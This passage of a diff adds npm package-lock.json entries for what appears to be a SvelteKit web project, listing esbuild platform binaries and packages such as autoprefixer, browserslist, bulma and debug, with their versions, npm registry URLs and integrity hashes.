"integrity": "sha512-8GDdlePJA8D6zlZYJV/jnrRAi6rOiNaCC/JclcXpB+KIuvfBN4owLtgzY2bsxnx666XjJx2kDPUmnTtR8qKQUg==", + "cpu": [ + "x64" + ], + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/darwin-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.18.20.tgz", + "integrity": "sha512-bxRHW5kHU38zS2lPTPOyuyTm+S+eobPUnTNkdJEfAddYgEcll4xkT8DB9d2008DtTbl7uJag2HuE5NZAZgnNEA==", + "cpu": [ + "arm64" + ], + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/darwin-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.18.20.tgz", + "integrity": "sha512-pc5gxlMDxzm513qPGbCbDukOdsGtKhfxD1zJKXjCCcU7ju50O7MeAZ8c4krSJcOIJGFR+qx21yMMVYwiQvyTyQ==", + "cpu": [ + "x64" + ], + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.18.20.tgz", + "integrity": "sha512-yqDQHy4QHevpMAaxhhIwYPMv1NECwOvIpGCZkECn8w2WFHXjEwrBn3CeNIYsibZ/iZEUemj++M26W3cNR5h+Tw==", + "cpu": [ + "arm64" + ], + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/freebsd-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.18.20.tgz", + "integrity": "sha512-tgWRPPuQsd3RmBZwarGVHZQvtzfEBOreNuxEMKFcd5DaDn2PbBxfwLcj4+aenoh7ctXcbXmOQIn8HI6mCSw5MQ==", + "cpu": [ + "x64" + ], + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-arm": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.18.20.tgz", + "integrity": "sha512-/5bHkMWnq1EgKr1V+Ybz3s1hWXok7mDFUMQ4cG10AfW3wL02PSZi5kFpYKrptDsgb2WAJIvRcDm+qIvXf/apvg==", + "cpu": [ + "arm" + ], + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.18.20.tgz", + "integrity": "sha512-2YbscF+UL7SQAVIpnWvYwM+3LskyDmPhe31pE7/aoTMFKKzIc9lLbyGUpmmb8a8AixOL61sQ/mFh3jEjHYFvdA==", + "cpu": [ + "arm64" + ], + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-ia32": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.18.20.tgz", + "integrity": "sha512-P4etWwq6IsReT0E1KHU40bOnzMHoH73aXp96Fs8TIT6z9Hu8G6+0SHSw9i2isWrD2nbx2qo5yUqACgdfVGx7TA==", + "cpu": [ + "ia32" + ], + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-loong64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.18.20.tgz", + "integrity": "sha512-nXW8nqBTrOpDLPgPY9uV+/1DjxoQ7DoB2N8eocyq8I9XuqJ7BiAMDMf9n1xZM9TgW0J8zrquIb/A7s3BJv7rjg==", + "cpu": [ + "loong64" + ], + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-mips64el": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.18.20.tgz", + "integrity": "sha512-d5NeaXZcHp8PzYy5VnXV3VSd2D328Zb+9dEq5HE6bw6+N86JVPExrA6O68OPwobntbNJ0pzCpUFZTo3w0GyetQ==", + "cpu": [ + "mips64el" + ], + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-ppc64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.18.20.tgz", + "integrity": "sha512-WHPyeScRNcmANnLQkq6AfyXRFr5D6N2sKgkFo2FqguP44Nw2eyDlbTdZwd9GYk98DZG9QItIiTlFLHJHjxP3FA==", + "cpu": [ + "ppc64" + ], + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-riscv64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.18.20.tgz", + "integrity": "sha512-WSxo6h5ecI5XH34KC7w5veNnKkju3zBRLEQNY7mv5mtBmrP/MjNBCAlsM2u5hDBlS3NGcTQpoBvRzqBcRtpq1A==", + "cpu": [ + "riscv64" + ], + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-s390x": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.18.20.tgz", + "integrity": "sha512-+8231GMs3mAEth6Ja1iK0a1sQ3ohfcpzpRLH8uuc5/KVDFneH6jtAJLFGafpzpMRO6DzJ6AvXKze9LfFMrIHVQ==", + "cpu": [ + "s390x" + ], + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.18.20.tgz", + "integrity": "sha512-UYqiqemphJcNsFEskc73jQ7B9jgwjWrSayxawS6UVFZGWrAAtkzjxSqnoclCXxWtfwLdzU+vTpcNYhpn43uP1w==", + "cpu": [ + "x64" + ], + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/netbsd-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.18.20.tgz", + "integrity": "sha512-iO1c++VP6xUBUmltHZoMtCUdPlnPGdBom6IrO4gyKPFFVBKioIImVooR5I83nTew5UOYrk3gIJhbZh8X44y06A==", + "cpu": [ + "x64" + ], + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/openbsd-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.18.20.tgz", + "integrity": "sha512-e5e4YSsuQfX4cxcygw/UCPIEP6wbIL+se3sxPdCiMbFLBWu0eiZOJ7WoD+ptCLrmjZBK1Wk7I6D/I3NglUGOxg==", + "cpu": [ + "x64" + ], + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/sunos-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.18.20.tgz", + "integrity": "sha512-kDbFRFp0YpTQVVrqUd5FTYmWo45zGaXe0X8E1G/LKFC0v8x0vWrhOWSLITcCn63lmZIxfOMXtCfti/RxN/0wnQ==", + "cpu": [ + "x64" + ], + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.18.20.tgz", + "integrity": "sha512-ddYFR6ItYgoaq4v4JmQQaAI5s7npztfV4Ag6NrhiaW0RrnOXqBkgwZLofVTlq1daVTQNhtI5oieTvkRPfZrePg==", + "cpu": [ + "arm64" + ], + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-ia32": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.18.20.tgz", + "integrity": "sha512-Wv7QBi3ID/rROT08SABTS7eV4hX26sVduqDOTe1MvGMjNd3EjOz4b7zeexIR62GTIEKrfJXKL9LFxTYgkyeu7g==", + "cpu": [ + "ia32" + ], + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.18.20.tgz", + "integrity": "sha512-kTdfRcSiDfQca/y9QIkng02avJ+NCaQvrMejlsB3RRv5sE9rRoeBPISaZpKxHELzRxZyLvNts1P27W3wV+8geQ==", + "cpu": [ + "x64" + ], + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@fastify/busboy": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", + "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@fontsource/fira-mono": { + "version": "4.5.10", + "resolved": "https://registry.npmjs.org/@fontsource/fira-mono/-/fira-mono-4.5.10.tgz", + "integrity": "sha512-bxUnRP8xptGRo8YXeY073DSpfK74XpSb0ZyRNpHV9WvLnJ7TwPOjZll8hTMin7zLC6iOp59pDZ8EQDj1gzgAQQ==", + "dev": true + }, + "node_modules/@jridgewell/gen-mapping": { + "version": "0.3.3", + "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", + "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", + "dependencies": { + "@jridgewell/set-array": "^1.0.1", + "@jridgewell/sourcemap-codec": "^1.4.10", + "@jridgewell/trace-mapping": "^0.3.9" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/resolve-uri": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.1.tgz", + "integrity": "sha512-dSYZh7HhCDtCKm4QakX0xFpsRDqjjtZf/kjI/v3T3Nwt5r8/qz/M19F9ySyOqU94SXBmeG9ttTul+YnR4LOxFA==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/set-array": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", + "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/sourcemap-codec": { + "version": "1.4.15", + "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", + "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==" + }, + "node_modules/@jridgewell/trace-mapping": { + "version": "0.3.20", + "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.20.tgz", + "integrity": "sha512-R8LcPeWZol2zR8mmH3JeKQ6QRCFb7XgUhV9ZlGhHLGyg4wpPiPZNQOOWhFZhxKw8u//yTbNGI42Bx/3paXEQ+Q==", + "dependencies": { + "@jridgewell/resolve-uri": "^3.1.0", + "@jridgewell/sourcemap-codec": "^1.4.14" + } + }, + "node_modules/@neoconfetti/svelte": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/@neoconfetti/svelte/-/svelte-1.0.0.tgz", + "integrity": "sha512-SmksyaJAdSlMa9cTidVSIqYo1qti+WTsviNDwgjNVm+KQ3DRP2Df9umDIzC4vCcpEYY+chQe0i2IKnLw03AT8Q==", + "dev": true + }, + "node_modules/@nodelib/fs.scandir": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", + "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", + "dev": true, + "dependencies": { + "@nodelib/fs.stat": "2.0.5", + "run-parallel": "^1.1.9" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.stat": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", + "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", + "dev": true, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.walk": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", + "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", + "dev": true, + "dependencies": { + "@nodelib/fs.scandir": "2.1.5", + "fastq": "^1.6.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@polka/url": { + "version": "1.0.0-next.23", + "resolved": "https://registry.npmjs.org/@polka/url/-/url-1.0.0-next.23.tgz", + "integrity": "sha512-C16M+IYz0rgRhWZdCmK+h58JMv8vijAA61gmz2rspCSwKwzBebpdcsiUmwrtJRdphuY30i6BSLEOP8ppbNLyLg==" + }, + "node_modules/@sveltejs/adapter-auto": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@sveltejs/adapter-auto/-/adapter-auto-2.1.1.tgz", + "integrity": "sha512-nzi6x/7/3Axh5VKQ8Eed3pYxastxoa06Y/bFhWb7h3Nu+nGRVxKAy3+hBJgmPCwWScy8n0TsstZjSVKfyrIHkg==", + "dev": true, + "dependencies": { + "import-meta-resolve": "^4.0.0" + }, + "peerDependencies": { + "@sveltejs/kit": "^1.0.0" + } + }, + "node_modules/@sveltejs/adapter-static": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@sveltejs/adapter-static/-/adapter-static-2.0.3.tgz", + "integrity": "sha512-VUqTfXsxYGugCpMqQv1U0LIdbR3S5nBkMMDmpjGVJyM6Q2jHVMFtdWJCkeHMySc6mZxJ+0eZK3T7IgmUCDrcUQ==", + "peerDependencies": { + "@sveltejs/kit": "^1.5.0" + } + }, + "node_modules/@sveltejs/kit": { + "version": "1.27.6", + "resolved": "https://registry.npmjs.org/@sveltejs/kit/-/kit-1.27.6.tgz", + "integrity": "sha512-GsjTkMbKzXdbeRg0tk8S7HNShQ4879ftRr0ZHaZfjbig1xQwG57Bvcm9U9/mpLJtCapLbLWUnygKrgcLISLC8A==", + "hasInstallScript": true, + "dependencies": { + "@sveltejs/vite-plugin-svelte": "^2.5.0", + "@types/cookie": "^0.5.1", + "cookie": "^0.5.0", + "devalue": "^4.3.1", + "esm-env": "^1.0.0", + "kleur": "^4.1.5", + "magic-string": "^0.30.0", + "mrmime": "^1.0.1", + "sade": "^1.8.1", + "set-cookie-parser": "^2.6.0", + "sirv": "^2.0.2", + "tiny-glob": "^0.2.9", + "undici": "~5.26.2" + }, + "bin": { + "svelte-kit": "svelte-kit.js" + }, + "engines": { + "node": "^16.14 || >=18" + }, + "peerDependencies": { + "svelte": "^3.54.0 || ^4.0.0-next.0 || ^5.0.0-next.0", + "vite": "^4.0.0" + } + }, + "node_modules/@sveltejs/vite-plugin-svelte": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/@sveltejs/vite-plugin-svelte/-/vite-plugin-svelte-2.5.2.tgz", + "integrity": "sha512-Dfy0Rbl+IctOVfJvWGxrX/3m6vxPLH8o0x+8FA5QEyMUQMo4kGOVIojjryU7YomBAexOTAuYf1RT7809yDziaA==", + "dependencies": { + "@sveltejs/vite-plugin-svelte-inspector": "^1.0.4", + "debug": "^4.3.4", + "deepmerge": "^4.3.1", + "kleur": "^4.1.5", + "magic-string": "^0.30.3", + "svelte-hmr": "^0.15.3", + "vitefu": "^0.2.4" + }, + "engines": { + "node": "^14.18.0 || >= 16" + }, + "peerDependencies": { + "svelte": "^3.54.0 || ^4.0.0 || ^5.0.0-next.0", + "vite": "^4.0.0" + } + }, + "node_modules/@sveltejs/vite-plugin-svelte-inspector": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@sveltejs/vite-plugin-svelte-inspector/-/vite-plugin-svelte-inspector-1.0.4.tgz", + "integrity": "sha512-zjiuZ3yydBtwpF3bj0kQNV0YXe+iKE545QGZVTaylW3eAzFr+pJ/cwK8lZEaRp4JtaJXhD5DyWAV4AxLh6DgaQ==", + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": "^14.18.0 || >= 16" + }, + "peerDependencies": { + "@sveltejs/vite-plugin-svelte": "^2.2.0", + "svelte": "^3.54.0 || ^4.0.0", + "vite": "^4.0.0" + } + }, + "node_modules/@types/cookie": { + "version": "0.5.4", + "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.5.4.tgz", + "integrity": "sha512-7z/eR6O859gyWIAjuvBWFzNURmf2oPBmJlfVWkwehU5nzIyjwBsTh7WMmEEV4JFnHuQ3ex4oyTvfKzcyJVDBNA==" + }, + "node_modules/@types/estree": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.5.tgz", + "integrity": "sha512-/kYRxGDLWzHOB7q+wtSUQlFrtcdUccpfy+X+9iMBpHK8QLLhx2wIPYuS5DYtR9Wa/YlZAbIovy7qVdB1Aq6Lyw==" + }, + "node_modules/@types/pug": { + "version": "2.0.10", + "resolved": "https://registry.npmjs.org/@types/pug/-/pug-2.0.10.tgz", + "integrity": "sha512-Sk/uYFOBAB7mb74XcpizmH0KOR2Pv3D2Hmrh1Dmy5BmK3MpdSa5kqZcg6EKBdklU0bFXX9gCfzvpnyUehrPIuA==", + "dev": true + }, + "node_modules/acorn": { + "version": "8.11.2", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.11.2.tgz", + "integrity": "sha512-nc0Axzp/0FILLEVsm4fNwLCwMttvhEI263QtVPQcbpfZZ3ts0hLsZGOpE6czNlid7CJ9MlyH8reXkpsf3YUY4w==", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/anymatch": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", + "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", + "dev": true, + "dependencies": { + "normalize-path": "^3.0.0", + "picomatch": "^2.0.4" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/aria-query": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.3.0.tgz", + "integrity": "sha512-b0P0sZPKtyu8HkeRAfCq0IfURZK+SuwMjY1UXGBU27wpAiTwQAIlq56IbIO+ytk/JjS1fMR14ee5WBBfKi5J6A==", + "dependencies": { + "dequal": "^2.0.3" + } + }, + "node_modules/autoprefixer": { + "version": "10.4.16", + "resolved": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.4.16.tgz", + "integrity": "sha512-7vd3UC6xKp0HLfua5IjZlcXvGAGy7cBAXTg2lyQ/8WpNhd6SiZ8Be+xm3FyBSYJx5GKcpRCzBh7RH4/0dnY+uQ==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/autoprefixer" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "browserslist": "^4.21.10", + "caniuse-lite": "^1.0.30001538", + "fraction.js": "^4.3.6", + "normalize-range": "^0.1.2", + "picocolors": "^1.0.0", + "postcss-value-parser": "^4.2.0" + }, + "bin": { + "autoprefixer": "bin/autoprefixer" + }, + "engines": { + "node": "^10 || ^12 || >=14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/axobject-query": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/axobject-query/-/axobject-query-3.2.1.tgz", + "integrity": "sha512-jsyHu61e6N4Vbz/v18DHwWYKK0bSWLqn47eeDSKPB7m8tqMHF9YJ+mhIk2lVteyZrY8tnSj/jHOv4YiTCuCJgg==", + "dependencies": { + "dequal": "^2.0.3" + } + }, + "node_modules/balanced-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "dev": true + }, + "node_modules/binary-extensions": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.2.0.tgz", + "integrity": "sha512-jDctJ/IVQbZoJykoeHbhXpOlNBqGNcwXJKJog42E5HDPUwQTSdjCHdihjj0DlnheQ7blbT6dHOafNAiS8ooQKA==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/brace-expansion": { + "version": "1.1.11", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", + "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, + "node_modules/braces": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", + "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", + "dev": true, + "dependencies": { + "fill-range": "^7.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/browserslist": { + "version": "4.22.1", + "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.22.1.tgz", + "integrity": "sha512-FEVc202+2iuClEhZhrWy6ZiAcRLvNMyYcxZ8raemul1DYVOVdFsbqckWLdsixQZCpJlwe77Z3UTalE7jsjnKfQ==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "caniuse-lite": "^1.0.30001541", + "electron-to-chromium": "^1.4.535", + "node-releases": "^2.0.13", + "update-browserslist-db": "^1.0.13" + }, + "bin": { + "browserslist": "cli.js" + }, + "engines": { + "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" + } + }, + "node_modules/buffer-crc32": { + "version": "0.2.13", + "resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz", + "integrity": "sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/bulma": { + "version": "0.9.4", + "resolved": "https://registry.npmjs.org/bulma/-/bulma-0.9.4.tgz", + "integrity": "sha512-86FlT5+1GrsgKbPLRRY7cGDg8fsJiP/jzTqXXVqiUZZ2aZT8uemEOHlU1CDU+TxklPEZ11HZNNWclRBBecP4CQ==" + }, + "node_modules/callsites": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", + "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/caniuse-lite": { + "version": "1.0.30001563", + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001563.tgz", + "integrity": "sha512-na2WUmOxnwIZtwnFI2CZ/3er0wdNzU7hN+cPYz/z2ajHThnkWjNBOpEPP4n+4r2WPM847JaMotaJE3bnfzjyKw==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/caniuse-lite" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ] + }, + "node_modules/chokidar": { + "version": "3.5.3", + "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-3.5.3.tgz", + "integrity": "sha512-Dr3sfKRP6oTcjf2JmUmFJfeVMvXBdegxB0iVQ5eb2V10uFJUCAS8OByZdVAyVb8xXNz3GjjTgj9kLWsZTqE6kw==", + "dev": true, + "funding": [ + { + "type": "individual", + "url": "https://paulmillr.com/funding/" + } + ], + "dependencies": { + "anymatch": "~3.1.2", + "braces": "~3.0.2", + "glob-parent": "~5.1.2", + "is-binary-path": "~2.1.0", + "is-glob": "~4.0.1", + "normalize-path": "~3.0.0", + "readdirp": "~3.6.0" + }, + "engines": { + "node": ">= 8.10.0" + }, + "optionalDependencies": { + "fsevents": "~2.3.2" + } + }, + "node_modules/code-red": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/code-red/-/code-red-1.0.4.tgz", + "integrity": "sha512-7qJWqItLA8/VPVlKJlFXU+NBlo/qyfs39aJcuMT/2ere32ZqvF5OSxgdM5xOfJJ7O429gg2HM47y8v9P+9wrNw==", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.4.15", + "@types/estree": "^1.0.1", + "acorn": "^8.10.0", + "estree-walker": "^3.0.3", + "periscopic": "^3.1.0" + } + }, + "node_modules/concat-map": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + "dev": true + }, + "node_modules/cookie": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.5.0.tgz", + "integrity": "sha512-YZ3GUyn/o8gfKJlnlX7g7xq4gyO6OSuhGPKaaGssGB2qgDUS0gPgtTvoyZLTt9Ab6dC4hfc9dV5arkvc/OCmrw==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/css-tree": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/css-tree/-/css-tree-2.3.1.tgz", + "integrity": "sha512-6Fv1DV/TYw//QF5IzQdqsNDjx/wc8TrMBZsqjL9eW01tWb7R7k/mq+/VXfJCl7SoD5emsJop9cOByJZfs8hYIw==", + "dependencies": { + "mdn-data": "2.0.30", + "source-map-js": "^1.0.1" + }, + "engines": { + "node": "^10 || ^12.20.0 || ^14.13.0 || >=15.0.0" + } + }, + "node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/deepmerge": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", + "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/dequal": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/dequal/-/dequal-2.0.3.tgz", + "integrity": "sha512-0je+qPKHEMohvfRTCEo3CrPG6cAzAYgmzKyxRiYSSDkS6eGJdyVJm7WaYA5ECaAD9wLB2T4EEeymA5aFVcYXCA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/detect-indent": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/detect-indent/-/detect-indent-6.1.0.tgz", + "integrity": "sha512-reYkTUJAZb9gUuZ2RvVCNhVHdg62RHnJ7WJl8ftMi4diZ6NWlciOzQN88pUhSELEwflJht4oQDv0F0BMlwaYtA==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/devalue": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/devalue/-/devalue-4.3.2.tgz", + "integrity": "sha512-KqFl6pOgOW+Y6wJgu80rHpo2/3H07vr8ntR9rkkFIRETewbf5GaYYcakYfiKz89K+sLsuPkQIZaXDMjUObZwWg==" + }, 